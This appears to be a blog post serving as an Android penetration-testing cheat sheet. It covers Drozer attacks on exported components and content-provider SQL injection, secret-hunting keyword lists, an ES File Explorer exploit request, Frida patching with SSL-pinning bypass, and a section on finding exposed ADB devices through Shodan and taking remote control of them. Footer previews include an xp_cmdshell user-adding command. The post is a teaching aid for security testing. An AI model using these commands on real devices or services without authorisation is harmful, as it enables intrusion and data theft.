Skip to main content

Android Pentest

By 




Port Scan on Android
as many random ports can be open on Android devices, its always better to scan all the ports using  

https://github.com/RustScan/RustScan/releases 
download the debian package 
dpkg -i filename
rustscan -a 10.10.10.247 

now scan all the open ports with nmap -sC -sV to run default script and for version scan.
Installing ADB 
sudo apt-get install android-tools-adb 
Setting up Drozer
#Installing drozer on docker 
docker pull withsecurelabs/drozer

#Downlaod the drozer Agent and install it on android
download from https://github.com/WithSecureLabs/drozer-agent/releases/tag/3.0.0

#Drag and drop on emulator or install via adb 
adb install drozer-agent.apk

#on Windows setup port forwarding for emulator
adb forward tcp:31415 tcp:31415

#Get a docker shell
docker run --net host -it --entrypoint sh withsecurelabs/drozer

#inside the container, start drozer
drozer console connect --server host.docker.internal


# Method - II
#Find the IP Address in about
#Connect the Android using IP address 
docker run --net host -it withsecurelabs/drozer console connect --server 10.10.10.10

#Get a shell
docker run --net host -it --entrypoint sh withsecurelabs/drozer
drozer console connect --server <phone IP address>


Drozer Commands
#list all functionality
list 

#List packages 
run app.package.list

#Filter for a specific app keyword
run app.package.list -f diva

#Basic info 
run app.package.info -a jakhar.aseem.diva 

#List About activates, broadcast, content providers and services
run app.package.attacksurface jakhar.aseem.diva

#If the App as Exported Activity
#Get Activity info 
run app.activity.info -a jakhar.aseem.diva


#View/Access the exported activity if Permission: null
run app.activity.start --component  jakhar.aseem.diva jakhar.aseem.diva.APICreds2Activity

run app.activity.start --component  app.package app.activy.path

#You can open the exported actvity directly from adb shell
adb shell am start -n jakhar.aseem.diva.APICreds2Activity


#If the app has providers 
#Get info on content providers
run app.provider.info -a jakhar.aseem.diva

#Run Scanner to find provider urls
#Take the content urls which are under "For Sure Accessible Content URIs"
run scanner.provider.finduris -a jakhar.aseem.diva

#Query a provider url
run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes/

#Look for Injection vulnerabilities in an app
run scanner.provider.injection -a jakhar.aseem.diva 

#Automatically exploit SLQ Injection - print tables
run scanner.provider.sqltables -a jakhar.aseem.diva

Static Analysis 
#Decompile the application
apktool d appication.apk

#Decompile without resources, use when the app is too huge
apktool d application.apk -r 

#Search for strings in all locations
#Even lib directory can contain some useful source code an API key
#Use Strings on .so/ELF files
#smali directory contains the source code - but its not in readable format, need to use dex to jar converter 


Locations to check for Secrets
- resources/res/values/strings.xml, xmls.xml, integers.xml, attrs.xml - find below strings
 - firebase_database_url
 - google_api_key
 - google_app_id
 - google_crash_reporting_api_key
 - google_storage_bucket
 - client_id
 - API
 - password
 - AWS
 - Secret
 - http:// or https://
 - .db or .sqllite or SQL 

or better use jadx-gui from 
https://github.com/skylot/jadx/releases/tag/v1.5.0
In Android Manifest.xml keywords to Look for  
- API Keys
- Providers  - Content Providers; find ones which are exported 
- SdkVersion
- Permissions 
 
#Activites with export=true can be started/opened from adb shell by running the command - just add a / before .activityname
am start b3nac.injuredandroid/.b25lActivity

# Make sure there is no sensitive data in the activity where exported=true
- exported="true" - Activities.
- backup   -- Application is saving some backup data when running - should be on the top
- Debug 

AWS Enumeration 
use Cloud Enum tool - available on github
Firebase DB Enum 
- see if you can find a firebase url in the source code, if yes try going to it and see what you can find there 
- dirb it and find any exposed content
- find the DB on the apk 

Use https://github.com/Sambal0x/firebaseEnum 

git clone https://github.com/Sambal0x/firebaseEnum.git
cd firebaseEnum
python -m pip install -r requirements.txt
python3 firebaseEunm.py -k APK_Name
Abusing ES File Explorer Vuln
Exploiting can be downloaded from here 

or can use curl to abuse it 


curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777
Installing and Setting up Frida & Objection
python -m pip install setuptools
python -m pip install frida-tools
python -m pip install objection

add this path to env PATH - Update as required "C:\Users\name\AppData\Local\Android\Sdk\build-tools\34.0.0"

#patch the apk with objection first, if that doenst work patch it with frida manually 
#A new apk is generated in the same directory with name.objection.apk 
#Drag and drop the new apk into android emulator, Uninstall the original apk and install the new patched apk. 
objection patchapk --source injuredAndroid.apk




Patching Manually using Frida
You can follow this tutorialtutorial

#Decompile without resources, use when the app is too huge
apktool d application.apk -r 

#Go to lib directory of the apk and go to appropriate architecture of the emulator
APK_NAME/lib/x86_64/

go to Frida Releases and download the appropriate gadget 
frida-gadget-16.3.3-android-x86_64.so.xz

#Rename the file to libfrida-gadget.so or frida-gadget.so (based on the libraries naming convention) and copy the file into APK_NAME/lib/x86_64/

#Paste the below code into any smali file which you know loads for sure - Example: MainActivity.smali under /APK_NAME/smali/COmpany/APK_NAME/ (Ex: injuredAndroid/smali/b3nac/injuredandroid/) and save it. 

const-string v0, "frida-gadget"
invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V



#Add the Internet permission to the manifest if it’s not there already, so that Frida gadget can open a socket.
<uses-permission android:name="android.permission.INTERNET" />


#ReBuild the apk 
apktool b injuredAndroid -o inured_patched.apk 
apktool b DirectoryPath -o Output.apk


#Sign the APK

keytool -genkey -v -keystore custom.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000

jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore custom.keystore -storepass password inured_patched.apk mykeyaliasname

jarsigner -verify inured_patched.apk



# Installing zipalign
nano /etc/apt/sources.list
#comment the kali apt source and add the below line
deb http://ftp.de.debian.org/debian buster main
sudo apt update 
sudo apt install zipalign

zipalign 4 inured_patched.apk inured_final.apk

#Drag and drop the final apk into emulator and start the apk
#Start objection to run the apk
objection explore

#Disable ssl pinning 
android sslpinning disable

Dynamic Analysis with MobSF
#for Linux 
download MobSF and run setup.sh then run.sh

#for Windows
Download docker from https://docs.docker.com/desktop/install/windows-install/ 

#Setup MobSF
docker pull opensecurity/mobile-security-framework-mobsf:latest

#Run MobSF
docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

#or add a new env variable 
Variable name: mobsf
Variable Value: docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

from now on type on cmd to run mobsf on docker
%mobsf%

#Access the application using creds mobsf/mobsf
http://127.0.0.1:8000/login/


#Add below path to Environmental variables PATH
C:\Users\Bhanu\AppData\Local\Android\Sdk\emulator

ADB Commands
ADB Cheatsheet is here

#Port forward a port from the Android device to ADB 
sudo ssh -p 22 -L 5555:127.0.0.1:5555 bhanu@steins.local

#Connect to a device over wireless
adb tcpip 9090

#connect to the service
adb connect 127.0.0.1:5555

#list connected devices
adb devices

#get a shell from a selected device
#adb -s device_name shell
adb -s 127.0.0.1:5555 shell


#get a shell
adb shell

#get root privs from a shell
su

#install an apk 
adb -s "25sdfsfb3801745eg" install "C:\Users\bhanu\Downloads\shell.apk"

#Getting screenshots
adb shell screencap <path to save>

#Recording the screen
adb shell screenrecord <path to save>

#Downloading files
adb pull <source file path> <destination file path>

#Uploading files
adb push <source file path> <destination file path>

#Visiting websites
adb shell am start -a android.intent.action.VIEW -d <URL of the website>

#Getting system information
getprop


Commands inside ADB Shell
#List Available packages
pm list packages 

# Find a specific package
pm list packages | grep Name

# Find the path of the package 
pm path full_packageName

pm path b3nac.injuredandroid
package:/data/app/b3nac.injuredandroid-1/base.apk


# Download the apk back into the main host machine 
#exit out of the adb shell 
exit 
adb pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk

#incase you have multiple emulators open
adb -s emulator-5556  pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk

# you can now open the apk for static analysis 
Finding Devices on Shodan 
android debug bridge
adb connect 100.100.100.100:5555
Get Remote Access of a device
apt install scrcpy
scrcpy

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD En...
Post a Comment
Read more

Forensics & Crypto

By
Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensical...
Post a Comment
Read more